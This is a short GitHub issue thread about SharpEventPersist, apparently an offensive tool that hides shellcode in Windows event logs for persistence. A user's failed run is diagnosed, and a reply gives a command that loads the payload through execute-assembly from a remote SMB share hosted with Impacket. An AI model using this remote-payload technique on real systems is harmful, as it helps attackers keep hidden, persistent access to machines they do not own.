SharpEventPersist icon indicating copy to clipboard operation
SharpEventPersist copied to clipboard

Published 20 hours ago verified publisher icon improsec

hello,

Open ZHOUXINGXING9 opened this issue 2 years ago • 1 comments

Using shellcode: C:\Users\Administrator\Desktop\payload.bin Setting event log instance id: 1337 Setting event log source to: Cobaltstrick Setting event log to: Key Management Service [-] Invoke_3 on EntryPoint failed. why?

ZHOUXINGXING9 avatar Aug 23 '22 07:08 ZHOUXINGXING9

Is the payload binary on the target at C:\Users\Adminsitrator\Desktop\payload.bin? If not, it will fail because SharpEventPersist looks at the file path on the target it is running.

If you want to host your payload remotely, you could do something like this:

execute-assembly /home/rbx/payload.bin -file \\<IP>\Share\payload.bin

Where the IP is a SMB sever with your payload. I used Impactet's SMBserver for my testing and it worked well..

image

roobixx avatar Sep 12 '22 22:09 roobixx